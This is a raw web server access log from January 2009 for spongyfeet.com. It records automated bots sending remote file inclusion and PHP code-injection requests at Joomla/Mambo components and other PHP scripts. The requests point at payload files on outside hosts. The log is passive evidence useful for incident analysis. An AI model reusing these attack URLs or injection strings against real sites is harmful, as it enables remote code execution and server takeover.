222.236.47.182 - - [05/Jan/2009:21:01:51 -0800] "GET /logs/access_081222.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:01:51 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:01:52 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:02:06 -0800] "GET /logs/access_081209.log//index.php?DOCUMENT_ROOT=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:02:07 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:02:07 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:02:08 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:02:11 -0800] "GET /logs/access_081226.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:02:19 -0800] "GET /logs/access_081209.log/errors.php?error=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:02:19 -0800] "GET /errors.php?error=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:02:19 -0800] "GET /logs/errors.php?error=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:02:20 -0800] "GET /logs/access.log/errors.php?error=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:02:45 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:02:54 -0800] "GET /logs/access_081222.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
69.117.40.56 - - [05/Jan/2009:21:03:23 -0800] "GET /images/folkloreburp.jpg HTTP/1.1" 404 275 "http://www.mommieswithstyle.com/mtblog/infant_and_nursery_products/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20" "spongyfeet.com"
74.6.8.103 - - [05/Jan/2009:21:03:23 -0800] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:04:27 -0800] "GET /errors.php?error=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:21:04:56 -0800] "GET /templates/be2004-2/index.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:21:04:56 -0800] "GET /logs/templates/be2004-2/index.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:21:04:57 -0800] "GET /logs/access_081207.log%20%20/templates/be2004-2/index.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:04:57 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
89.36.39.203 - - [05/Jan/2009:21:07:06 -0800] "GET /component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
89.36.39.203 - - [05/Jan/2009:21:07:13 -0800] "GET /logs//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:08:53 -0800] "GET /logs/templates/be2004-2/index.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:08:53 -0800] "GET /templates/be2004-2/index.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:08:54 -0800] "GET /logs/access_081207.log/templates/be2004-2/index.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
72.55.174.114 - - [05/Jan/2009:21:08:58 -0800] "GET /templates/be2004-2/index.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
72.55.174.114 - - [05/Jan/2009:21:08:58 -0800] "GET /logs/templates/be2004-2/index.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
72.55.174.114 - - [05/Jan/2009:21:08:58 -0800] "GET /logs/access_081207.log%20%20/templates/be2004-2/index.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
74.200.70.94 - - [05/Jan/2009:21:09:10 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.spongyfeet.com"
74.200.70.94 - - [05/Jan/2009:21:09:18 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:21:10:23 -0800] "GET /logs/access_081207.log/templates/be2004-2/index.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
66.147.239.184 - - [05/Jan/2009:21:10:41 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.skarstad.net/forum/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
66.147.239.184 - - [05/Jan/2009:21:10:41 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.skarstad.net/forum/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
66.147.239.184 - - [05/Jan/2009:21:10:41 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.skarstad.net/forum/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
77.222.40.154 - - [05/Jan/2009:21:11:41 -0800] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
77.222.40.154 - - [05/Jan/2009:21:11:42 -0800] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
140.130.101.5 - - [05/Jan/2009:21:12:56 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
140.130.101.5 - - [05/Jan/2009:21:12:56 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
140.130.101.5 - - [05/Jan/2009:21:12:57 -0800] "GET /logs/access_081209.log//index.php?DOCUMENT_ROOT=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
140.130.101.5 - - [05/Jan/2009:21:12:58 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:13:36 -0800] "GET /logs/access_081207.log%20%20/templates/be2004-2/index.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:13:36 -0800] "GET /logs/templates/be2004-2/index.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:13:36 -0800] "GET /templates/be2004-2/index.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
74.200.70.94 - - [05/Jan/2009:21:14:25 -0800] "GET /logs/access_081226.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.spongyfeet.com"
74.200.70.94 - - [05/Jan/2009:21:14:25 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.spongyfeet.com"
74.200.70.94 - - [05/Jan/2009:21:14:26 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.spongyfeet.com"
72.55.174.114 - - [05/Jan/2009:21:15:03 -0800] "GET /logs/access_081207.log/templates/be2004-2/index.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
74.200.70.94 - - [05/Jan/2009:21:15:45 -0800] "GET /logs/access_081226.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.spongyfeet.com"
74.200.70.94 - - [05/Jan/2009:21:15:45 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.spongyfeet.com"
74.200.70.94 - - [05/Jan/2009:21:15:45 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.spongyfeet.com"
64.38.24.138 - - [05/Jan/2009:21:18:15 -0800] "GET /logs/access_081226.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
64.38.24.138 - - [05/Jan/2009:21:18:15 -0800] "GET /logs/access_081226.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
64.38.24.138 - - [05/Jan/2009:21:18:15 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
64.38.24.138 - - [05/Jan/2009:21:18:15 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
64.38.24.138 - - [05/Jan/2009:21:18:15 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
64.38.24.138 - - [05/Jan/2009:21:18:15 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:21:19:08 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:21:19:08 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:20:49 -0800] "GET /logs/access_081207.log/templates/be2004-2/index.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
213.226.166.122 - - [05/Jan/2009:21:22:22 -0800] "GET /logs/access_081226.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:21:25:52 -0800] "GET /logs/access_081226.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:21:25:53 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:21:25:53 -0800] "GET /logs/access_081226.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:21:25:54 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:21:25:54 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:21:25:55 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
114.108.129.248 - - [05/Jan/2009:21:26:13 -0800] "GET /?sIncPath=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.spongyfeet.com"
114.108.129.248 - - [05/Jan/2009:21:26:13 -0800] "GET /logs/?sIncPath=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 200 2803 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:21:27:09 -0800] "GET /logs/access_081226.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:21:27:10 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:21:27:10 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:21:27:21 -0800] "GET /logs/access_081226.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:21:27:21 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:21:27:22 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
85.214.53.78 - - [05/Jan/2009:21:35:22 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
77.222.40.154 - - [05/Jan/2009:21:36:24 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
77.222.40.154 - - [05/Jan/2009:21:36:55 -0800] "GET /logs/access_081215.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
77.222.40.154 - - [05/Jan/2009:21:36:55 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
77.222.40.154 - - [05/Jan/2009:21:36:55 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
85.214.53.78 - - [05/Jan/2009:21:38:12 -0800] "GET /logs/access_081226.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
85.214.53.78 - - [05/Jan/2009:21:38:12 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
85.214.53.78 - - [05/Jan/2009:21:38:13 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
213.226.166.122 - - [05/Jan/2009:21:38:18 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:21:38:23 -0800] "GET /logs/access_081207.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:21:41:47 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:21:41:47 -0800] "GET /logs/access_081220.log%20%20/akocomments.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:21:41:47 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
77.222.40.154 - - [05/Jan/2009:21:41:48 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_wrapper&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
77.222.40.154 - - [05/Jan/2009:21:41:48 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_wrapper&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
85.214.53.78 - - [05/Jan/2009:21:41:52 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:21:42:06 -0800] "GET /logs/access_081226.log%20%20/akocomments.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
77.222.40.154 - - [05/Jan/2009:21:42:08 -0800] "GET /logs/access_081214.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
213.226.166.122 - - [05/Jan/2009:21:42:11 -0800] "GET /logs/access_081215.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
213.226.166.122 - - [05/Jan/2009:21:42:12 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
213.226.166.122 - - [05/Jan/2009:21:42:14 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:21:42:43 -0800] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
213.226.166.122 - - [05/Jan/2009:21:44:12 -0800] "GET /logs/access_081205.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
